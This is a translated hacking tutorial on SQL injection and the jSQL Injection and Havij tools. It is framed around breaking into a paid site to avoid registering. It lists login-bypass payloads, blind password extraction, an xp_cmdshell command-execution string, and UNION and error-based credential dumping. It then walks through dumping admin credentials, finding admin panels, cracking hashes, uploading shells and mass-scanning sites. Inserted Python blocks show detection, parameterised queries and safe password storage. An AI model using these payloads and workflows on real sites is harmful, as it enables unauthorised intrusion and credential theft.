Instructions for using jSQL Injection, a multifunctional tool for finding and exploiting SQL injections in Kali Linux. SQL Injection from A to Z.

SQL Injection is a pretty good way for a hacker to get access to a server. And with a little effort, he gets it :)

Coder inside

Nowadays, working with databases is supported by almost all programming languages, including BASIC, C++, Java, PERL, PHP, Assembler and even JavaScript! The programs that manage the data are called nothing other than DBMS - database management systems. Databases are often used to solve financial, accounting and personnel-management tasks, but they have also found their application on the Internet.

Databases are widely used when writing WEB applications. They are most appropriate for storing user registration data and session identifiers, for organizing searches, and for other tasks that require processing large amounts of data. Server-side technologies are used to access the database: PHP, PERL, ASP, etc. This is where the fun begins. When all patches are installed on the server, the firewall blocks every port except 80, and authentication is required to access some data, a hacker can use SQL Injection to break in. The essence of this attack is to exploit an error at the junction of WEB technologies and SQL: many web pages build a special SQL query out of the user data they process. Careless use of this technique can lead to quite interesting results...

SQL Injection

To explain the attack, let's imagine that you went to a site to download one very important tool and notice with horror that only a registered user can do this, and registration, of course, costs money 🙂 You don't want to give away your last earned money, but you can't do without the program! It's time to remember how SQL databases are accessed. For example, checking a login and password in PHP may look like this:

// $db, $table and $link are set up earlier in the script.
// Deliberately vulnerable: $login and $password are pasted straight into the query text.
$result = mysql_db_query($db, "SELECT * FROM $table WHERE user=\"$login\" AND pass=\"$password\"");
$num_rows = mysql_num_rows($result);
mysql_close($link);
if ($num_rows != 0)
{
    // AUTHENTICATION OK
}
else
{
    // AUTHENTICATION ERROR
}

I added two comments. In place of "AUTHENTICATION OK" goes the code that will be executed if the login and password are correct; "AUTHENTICATION ERROR" marks the place for the code that runs if they are incorrect. If you fill out the form, the request will look like “http://www.server.com?login=user&password=31337”, where www.server.com is the name of the server we are trying to connect to. We found what we were looking for, so let's get back to SQL. If a login and password must be given for authorization, the generated SQL query will look like this:

SELECT * FROM users WHERE login="user" AND password="31337"

This means roughly: return to me all records from the users table whose login is “user” and whose password is “31337”. If such a record exists, the user is registered; if not, he is not... But under certain circumstances everything can be corrected. This refers to the situation when the application does not check the transmitted data, or does not check it completely, for the presence of SQL instructions. In this example two fields, login and password, are checked, but if you enter 31337" AND email="[email protected] as the password (typed exactly like that, without surrounding quotes), the query turns out a little different:

SELECT * FROM users WHERE login="user" AND password="31337" AND email="[email protected]"

And if the email field exists, this condition will be checked too. If you remember the basics of Boolean algebra, it comes to mind that besides the “and” operation there is also an “or”, and since SQL supports both, you can add, in the way described, a condition that is always true. To do this, specify user" OR 1=1-- as the login, in which case the query takes the form:

SELECT * FROM users WHERE login="user" OR 1=1--" AND password="31337"

First you should know that "--" means the end of the query (it starts an SQL comment), and everything after the "--" is not processed! It turns out that we made the query:

SELECT * FROM users WHERE login="user" OR 1=1

As you can see, we added the condition “1=1”, so the check becomes “if the login is “user” or 1=1”, and 1 always equals 1 (the only exception can be Dani Shepovalov’s arithmetic :)). To test our suspicion, enter "http://www.server.com?login=user or 1=1--&password=31337" in the address bar. The result is that it does not matter which login we specified, and especially not which password! And we are in the matrix, in the system, and can calmly download what we need.

But this is all theory. In practice we do not know how the query is formed, what data is passed and in what order. Therefore you should try "user" OR 1=1--" in all fields. You should also check the submission form for hidden fields; in HTML they are written as <input type="hidden" name="..." value="...">. If there are any, save the page and change the values of these fields: the values they carry are often forgotten when checking for SQL statements. For everything to work, the "ACTION" parameter of the form ("FORM" tag) must contain the full path to the script that processes the request.

But it is not always known how the query is formed. The previous example could have been built in any of the following ways:

SELECT * FROM users WHERE (login="user" AND password="31337")
SELECT * FROM users WHERE login="user" AND password="31337"
SELECT * FROM users WHERE login=user AND password=31337

In this case, you can try the following options:

' OR 1=1--
" OR 1=1--
OR 1=1--
' OR 'a'='a
" OR "a"="a
') OR ('a'='a
OR '1'='1'
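The same payload shapes, seen from the defender's side: the script below is an added example, not code from the original article, and implements a small rule set of the kind a WAF signature or a log-review job would use. It URL-decodes every query-string parameter of a request and reports which rules the value triggers (quote that escapes the literal, OR-tautology, trailing comment, stacked statement). The rule names and the sample requests are constructed for this example.

```python
"""Flag the classic SQL-injection shapes from the list above in request parameters.

Added example, not from the original article: a small rule set of the kind a
WAF signature or a log-review script would use. It URL-decodes each query-string
parameter and reports which rules its value triggers. All sample requests are
constructed for this example.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Rules key on the structural feature of each payload (a quote that escapes the
# literal, an OR-tautology, a trailing comment, a stacked statement), so spacing
# and case variants are caught as well as the exact strings listed in the article.
RULES = [
    # OR 1=1, OR "a"="a, OR ("a"="a ... with or without quotes around the operands
    ("tautology", re.compile(r"""\bor\b\s*\(?\s*(['"]?)(\w+)\1\s*=\s*\1\2\1?""", re.I)),
    # a comment marker that swallows the rest of the original query
    ("comment-tail", re.compile(r"""(--|#)\s*$""")),
    # a quote immediately followed by a keyword or a structural character
    ("quote-break", re.compile(r"""['"]\s*(?:(?:or|and|union)\b|[);])""", re.I)),
    # a second statement appended after a semicolon
    ("stacked-query", re.compile(r"""[;]\s*(?:exec|drop|insert|update|delete|shutdown)\b""", re.I)),
]


def classify_value(value):
    """Return the names of all rules the (already URL-decoded) value triggers."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_request(url):
    """Decode every query-string parameter of a request URL.

    Returns {parameter: [rule, ...]} for the flagged parameters only, so an
    empty dict means nothing in the request matched.
    """
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits = classify_value(value)
        if hits:
            findings[name] = hits
    return findings


# Constructed access-log style requests: a normal login, the article's bypass
# strings, a benign value containing an apostrophe and the word "or", and a
# stacked xp_cmdshell statement of the kind shown in the MS SQL section.
SAMPLE_REQUESTS = [
    "http://www.server.com/login.php?login=user&password=31337",
    "http://www.server.com/login.php?login=user%22%20OR%201%3D1--&password=31337",
    "http://www.server.com/login.php?login=%22%20OR%20%22a%22%3D%22a&password=x",
    "http://www.server.com/login.php?login=O%27Brien&password=rock%20or%20roll",
    "http://www.server.com/search.asp?q=%22%3B%20exec%20master..xp_cmdshell%20%22dir%22%20--",
]

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        print(scan_request(url) or "clean", "<-", url)
```

The rules deliberately key on structure rather than on exact strings, so "user" OR 1=1--" and "user' or 1 = 1 --" both trip the tautology rule, while O'Brien and "rock or roll" pass through clean.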

It all depends on the purpose of the script and on the programmer. Since everyone tends to do things his own way, it is quite possible that the programmer did not choose the simplest option. Therefore you should not give up immediately if you get rejected. You need to try as many options as possible...

Determining the password

Bypassing authorization is not bad, but very often the hole you are using gets closed, and everything that was available to you is lost. This is to be expected: if the programmer is not a fool, he will close all the loopholes over time. You can easily avoid such situations by taking care of it in advance. The right solution may be to guess the password by analysing the authentication results. First, let's try to guess the password; to do this, enter in the password field:

"OR password>"a

If we are told that authorization has passed, the password does not begin with the letter "a" but with one of the letters that follow it in the list. Let's move on and substitute "b", "c", "d", "e"... and so on in place of "a" until we are told that the password is incorrect. Let this process stop at the character “x”. Two possibilities arise: either the password has been found or it begins with this character. To check the first option, write in the password field:

"OR password="x

and if the password is accepted and you are let in, you have guessed the password! If not, you should pick the second character in exactly the same way, starting from the beginning, and check the two characters together in the same manner. In the end you will get a password, and the login is found the same way :)
If the password and login you found do not suit you, you can find others. To do this, start checking from the last character of the found password. So, if the password was "xxx", you need to check for the existence of a password "xxxy":

" OR password>"xxx

so as not to miss any other option!

MS SQL Server

MS SQL Server is generally a godsend if the necessary filtering is missing. Using an SQL Injection vulnerability you can execute commands on the remote server with exec master..xp_cmdshell. But to use this construct, the SELECT statement must be terminated first; in SQL, statements are separated by semicolons. So, to connect to some IP via Telnet, you type as the password/login:

"; exec master..xp_cmdshell "telnet 192.168.0.1" --

MS SQL Server has several more interesting features that let you find out the logins and passwords stored in the database. To do this, error output is redirected to an arbitrary server, and by analysing the errors you can learn the table name, the fields and their types. After that you can request

" UNION SELECT TOP 1 login FROM users--

(login is the name of the field containing the login and users is the name of the table, both found out during the error analysis).

The answer might be:


Syntax error converting the nvarchar value "admin" to a column of data type int. !}
/default.asp, line 27

Now we know that there is a user named "admin". Next we can get his password:

" UNION SELECT TOP 1 password FROM users where login="admin"--

Result:

Microsoft OLE DB Provider for ODBC Drivers error "80040e07"
Syntax error converting the nvarchar value "xxx" to a column of data type int.
/default.asp, line 27

Now we know there is a user "admin" with the password "xxx". With this you can safely use it and log in to the system 😉

But there are many other functions for working with SQL. When working with a database you can also delete data, modify it, insert your own, and even manipulate files and work with the registry.
In general, SQL Server rules :)

Protection

But of course all this can be avoided. To do this you can use the filters provided by the vendors. You can also find your own solutions, for example replacing all single quotes with double ones (if the SQL query uses single quotes), or vice versa. You can allow only letters and the @ sign if an e-mail address is to be entered. And in Perl there is the wonderful 🙂 quote() function in the DBI::DBD module, which successfully makes your query safe with respect to SQL. There are many solutions, you just need to use them. Otherwise, what is all this for...
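To make the protection point concrete, here is the article's login check written both the vulnerable way (the PHP snippet from the "SQL Injection" section, translated) and the safe way with a parameterised query. This is an added example, not code from the original article: it uses Python's built-in sqlite3 with an in-memory database so it runs offline. SQLite wants single quotes around string literals, so the bypass string uses ' where the MySQL examples above use ". The users table and its two rows are constructed for this example and hold plaintext passwords only because the article's schema does.

```python
"""The article's login check, written both the vulnerable way and the safe way.

Added example, not code from the original article. It uses Python's built-in
sqlite3 with an in-memory database so it runs offline; SQLite wants single
quotes around string literals, so the bypass string below uses ' where the
MySQL examples in the article use ". The users table and its two rows are
constructed for this example.
"""
import sqlite3


def make_db():
    """Constructed sample database: two users with plaintext passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("user", "31337"), ("admin", "s3cret")])
    return conn


def build_vulnerable_sql(login, password):
    """Mirror of the PHP snippet: user input pasted straight into the query text."""
    return f"SELECT * FROM users WHERE login='{login}' AND password='{password}'"


def login_vulnerable(conn, login, password):
    """Returns True when at least one row matches, exactly like the PHP code.

    With login = "user' OR 1=1--" the quote closes the literal, OR 1=1 makes the
    WHERE clause true for every row and -- comments out the password check.
    """
    rows = conn.execute(build_vulnerable_sql(login, password)).fetchall()
    return len(rows) != 0


def login_safe(conn, login, password):
    """Parameterised query: the driver sends the values separately from the SQL
    text, so a quote or "OR 1=1--" inside a value can only ever be compared as
    data against the login column, never interpreted as SQL."""
    rows = conn.execute(
        "SELECT * FROM users WHERE login=? AND password=?", (login, password)
    ).fetchall()
    return len(rows) != 0


if __name__ == "__main__":
    db = make_db()
    bypass = "user' OR 1=1--"          # the article's payload, single-quote form
    print(build_vulnerable_sql(bypass, "wrong"))
    print("vulnerable:", login_vulnerable(db, bypass, "wrong"))   # True
    print("safe:      ", login_safe(db, bypass, "wrong"))         # False
```

The quote-replacement trick the article suggests only narrows the problem (numeric fields, for instance, take no quotes at all); binding parameters removes it, because the query text and the values travel to the database separately.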

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It’s a completely automated SQL Injection tool distributed by ITSecTeam, an Iranian security organization. The name Havij means “carrot”, which is the tool’s icon.

The tool comes with an easy-to-understand GUI that makes it simple for an operator to retrieve the desired data. Such usability may be the reason for the shift from attacks carried out by code-writing hackers to those carried out by non-technical users.


Havij was launched in 2010, and since its release a few other automated SQL Injection tools (for example, sqlmap) have been introduced. Be that as it may, Havij is still active and commonly used by both penetration testers and low-level hackers.

Havij SQL Injection Software Features

It can exploit a vulnerable web application. By using this product a user can perform back-end database fingerprinting, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system.

  1. Complete HTTPS support
  2. Various updates are available
  3. Added MS SQL blind
  4. Blind MSAccess (in commercial version only)
  5. PostgreSQL
  6. Easily accessible user manual
  7. Additional dumping data file feature
  8. XML format comes with the tool for data storage
  9. User can remove the log
  10. The default settings can be changed at any time
  11. Repair methods are available to cover up the weaknesses of the website
  12. Keyword testing is also available
  13. Error fixing feature

Havij v1.12 Free Edition Download

What sets Havij apart from comparable tools is its injection techniques. Its success rate is over 95% on injection-vulnerable targets.

The easy-to-understand GUI (Graphical User Interface) of Havij, together with its automated settings and detections, makes it simple to use for everyone, even beginners.

Run the downloaded file by double clicking (you need to have a virtual machine).

3. Anonymity when checking a site for SQL injection

Setting up Tor and Privoxy in Kali Linux

[Section under development]

Setting up Tor and Privoxy on Windows

[Section under development]

Proxy settings in jSQL Injection

[Section under development]

4. Checking the site for SQL injection with jSQL Injection

Working with the program is extremely simple. Just enter the website address and press ENTER.

The following screenshot shows that the site is vulnerable to three types of SQL injections (information about them is indicated in the lower right corner). By clicking on the names of injections, you can switch the method used:

Also, the existing databases have already been displayed to us.

You can view the contents of each table:

Typically, the most interesting thing about tables is the administrator credentials.

If you are lucky and find the administrator’s data, it is too early to rejoice: you still need to find the admin panel where this data is entered.

5. Search for admin panels with jSQL Injection

To do this, go to the next tab. Here we are greeted with a list of possible addresses. You can select one or more pages to check:

The convenience lies in the fact that you do not need to use other programs.

Unfortunately, careless programmers who store passwords in clear text are not that common. Quite often in the password column we see something like

8743b52063cd84097a65d1633f5c74f5

This is a hash. You can recover the password from it by brute force. And... jSQL Injection has a built-in brute forcer.

6. Brute force hashes using jSQL Injection

The undoubted convenience is that you do not need to look for other programs. There is support for many of the most popular hashes.

This is not the best option. In order to become a guru at cracking hashes, the book “” (in Russian) is recommended.

But, of course, when there is no other program at hand or there is no time to study, jSQL Injection with its built-in brute force function will come in very handy.

There are settings: you can choose which characters the password is made of and the range of password lengths.
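Before pointing any brute forcer at a value like the one above, a practitioner first asks what kind of hash it is, and a defender asks why it was recoverable at all. The script below is an added example, not code from the original article or from jSQL Injection: guess_hash_type() does the length-based triage, wordlist_check_md5() shows that the article's hash falls to a five-word constructed list because it is an unsalted fast hash, and store_password()/verify_password() show the storage fix (salted PBKDF2-SHA256 with a constant-time comparison). The "algo$rounds$salt$dk" record format is an assumption made for this example, not a standard.

```python
"""Triage a password hash like the one above and show the storage fix.

Added example, not from the original article. guess_hash_type() is the first
step before any brute force: a 32-hex-character value is almost always MD5 (or
NTLM). wordlist_check_md5() then shows why an unsalted fast hash is weak: the
article's hash falls to a five-word constructed list. store_password() and
verify_password() are the defensive counterpart, a salted PBKDF2-SHA256 hash
with a constant-time comparison. The record format "algo$rounds$salt$dk" is an
assumption made for this example, not a standard.
"""
import hashlib
import hmac
import os

PAGE_HASH = "8743b52063cd84097a65d1633f5c74f5"   # the value shown in the article
WORDLIST = ["123456", "password", "qwerty", "hashcat", "letmein"]   # constructed


def guess_hash_type(digest):
    """Classify a hex digest by its length (a hint, not proof of the algorithm)."""
    if not digest or any(c not in "0123456789abcdefABCDEF" for c in digest):
        return "not a plain hex digest"
    by_length = {32: "MD5 (or NTLM)", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}
    return by_length.get(len(digest), f"unknown ({len(digest)} hex chars)")


def wordlist_check_md5(digest, words):
    """Return the word whose unsalted MD5 equals digest, or None.

    One hash computation per guess and no salt: this is why a leaked MD5
    column is as good as plaintext for any password that appears in a list.
    """
    target = digest.lower()
    for word in words:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def store_password(password, salt=None, rounds=200_000):
    """Salted, iterated hash: identical passwords give different records, and
    each guess costs `rounds` hash computations instead of one."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"


def verify_password(password, record):
    """Recompute with the stored salt and rounds; compare in constant time."""
    algo, rounds, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(guess_hash_type(PAGE_HASH))                      # MD5 (or NTLM)
    print(wordlist_check_md5(PAGE_HASH, WORDLIST))         # hashcat
    record = store_password("hashcat")
    print(record)
    print(verify_password("hashcat", record), verify_password("carrot", record))
```

With the salted record, the same five-word list would have to be re-hashed per user at 200 000 rounds each, which is what turns "brute force in a GUI tab" back into a real cost.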

7. File operations after detecting SQL injections

In addition to database operations (reading and modifying them), once an SQL injection is found the following file operations can be performed:

  • reading files on the server
  • uploading new files to the server
  • uploading shells to the server

And all this is implemented in jSQL Injection!

There are restrictions: the SQL server must have file privileges. Smart system administrators have them disabled, and then it will not be possible to gain access to the file system.

The presence of file privileges is quite simple to check. Go to one of the tabs (reading files, creating a shell, uploading a new file) and try to perform one of the specified operations.

Another very important note: we need to know the exact absolute path of the file we are going to work with, otherwise nothing will work.

Look at the following screenshot:

To any attempt to operate on a file we receive the response "No FILE privilege" (no file privileges). Nothing can be done here.

If instead you have another error:

Problem writing into [directory_name]

This means that you incorrectly specified the absolute path where you want to write the file.

In order to guess an absolute path, you need to at least know the operating system the server is running on. To do this, switch to the Network tab.

A record like this (the Win64 token) gives us reason to assume that we are dealing with Windows:

Keep-Alive: timeout=5, max=99
Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6
Connection: Keep-Alive
Method: HTTP/1.1 200 OK
Content-Length: 353
Date: Fri, 11 Dec 2015 11:48:31 GMT
X-Powered-By: PHP/7.0.0RC6
Content-Type: text/html; charset=UTF-8

Here we have some Unix (*BSD, Linux):

Transfer-Encoding: chunked
Date: Fri, 11 Dec 2015 11:57:02 GMT
Method: HTTP/1.1 200 OK
Keep-Alive: timeout=3, max=100
Connection: keep-alive
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Server: Apache/2.2.31 (Unix)

And here we have CentOS:

Method: HTTP/1.1 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/
Connection: keep-alive
X-Cache-Lookup: MISS from t1.hoster.ru:6666
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.4.37
X-Cache: MISS from t1.hoster.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Fri, 11 Dec 2015 12:08:54 GMT
Transfer-Encoding: chunked
Content-Type: text/html; charset=WINDOWS-1251
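The three header blocks above are exactly what the Network tab hands you, and the clue the text relies on is the parenthesised platform token of the Server header. The script below is an added example, not code from the original article or from jSQL Injection: it parses those blocks (one header per line; "Method:" is how jSQL Injection labels the status line), infers the OS family the way the text does, and, from the defender's side, lists which headers disclose software versions that a server operator would normally suppress (Apache ServerTokens Prod, PHP expose_php = Off).

```python
"""Parse the response headers shown above and infer the server OS from them.

Added example, not from the original article. The three header blocks are the
ones quoted in the text, one header per line. guess_os() reads the
parenthesised platform token of the Server header, the same clue the article
uses; banner_exposure() is the defender's view of the same data: which headers
give away software versions.
"""
import re

WINDOWS_HEADERS = """\
Keep-Alive: timeout=5, max=99
Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6
Connection: Keep-Alive
Method: HTTP/1.1 200 OK
Content-Length: 353
Date: Fri, 11 Dec 2015 11:48:31 GMT
X-Powered-By: PHP/7.0.0RC6
Content-Type: text/html; charset=UTF-8
"""

UNIX_HEADERS = """\
Transfer-Encoding: chunked
Date: Fri, 11 Dec 2015 11:57:02 GMT
Method: HTTP/1.1 200 OK
Keep-Alive: timeout=3, max=100
Connection: keep-alive
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Server: Apache/2.2.31 (Unix)
"""

CENTOS_HEADERS = """\
Method: HTTP/1.1 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/
Connection: keep-alive
X-Cache-Lookup: MISS from t1.hoster.ru:6666
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.4.37
X-Cache: MISS from t1.hoster.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Fri, 11 Dec 2015 12:08:54 GMT
Transfer-Encoding: chunked
Content-Type: text/html; charset=WINDOWS-1251
"""

# Distribution tokens Apache puts in parentheses, mapped to display names.
DISTRO_TOKENS = {"centos": "CentOS", "debian": "Debian", "ubuntu": "Ubuntu",
                 "red hat": "Red Hat", "fedora": "Fedora", "freebsd": "FreeBSD"}


def parse_headers(block):
    """Split 'Name: value' lines into a dict with lower-cased names. Only the
    first colon separates name from value, so dates and cookies stay intact."""
    headers = {}
    for line in block.strip().splitlines():
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def guess_os(headers):
    """Infer the OS family from the platform token in Server, e.g. '(Win64)'."""
    match = re.search(r"\(([^)]*)\)", headers.get("server", ""))
    token = match.group(1).strip().lower() if match else ""
    if token.startswith("win"):                 # Win32 / Win64
        return "Windows"
    for key, name in DISTRO_TOKENS.items():
        if key in token:
            return name
    if "unix" in token:
        return "Unix-like"
    return "unknown"


def banner_exposure(headers):
    """Headers that leak a version number (anything with a digit in its value)."""
    return [h for h in ("server", "x-powered-by") if re.search(r"\d", headers.get(h, ""))]


if __name__ == "__main__":
    for block in (WINDOWS_HEADERS, UNIX_HEADERS, CENTOS_HEADERS):
        h = parse_headers(block)
        print(guess_os(h), "| version-leaking headers:", banner_exposure(h))
```

All three blocks from the page leak both the web server and the PHP version; a server that only returned "Server: Apache" with no X-Powered-By would give the Network tab nothing to work with.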

On Windows, a typical folder for sites is C:\Server\data\htdocs\. But, in fact, if someone “thought of” making a server on Windows, then, very likely, this person has not heard anything about privileges. Therefore, you should start trying directly from the C:/Windows/ directory:

As you can see, everything went fine the first time.

But the jSQL Injection shells themselves raise doubts in my mind. If you have file privileges, then you can easily upload something with a web interface.

8. Mass checking of sites for SQL injections

And even this function is available in jSQL Injection. Everything is extremely simple - download a list of sites (you can import from a file), select those that you want to check and click the appropriate button to start the operation.

Conclusion from jSQL Injection

jSQL Injection is a good, powerful tool for searching and then using SQL injections found on websites. Its undoubted advantages: ease of use, built-in related functions. jSQL Injection can be a beginner's best friend when analyzing websites.

Among the shortcomings, I would note the impossibility of editing databases (at least I did not find this functionality). As with all GUI tools, one of the disadvantages of this program can be attributed to its inability to be used in scripts. Nevertheless, some automation is also possible in this program - thanks to the built-in function of mass site scanning.

The jSQL Injection program is much more convenient to use than sqlmap. But sqlmap supports more types of SQL injection, has options for working around firewalls, and some other functions.

Bottom line: jSQL Injection is a novice hacker's best friend.

Help for this program in the Kali Linux Encyclopedia can be found on this page: http://kali.tools/?p=706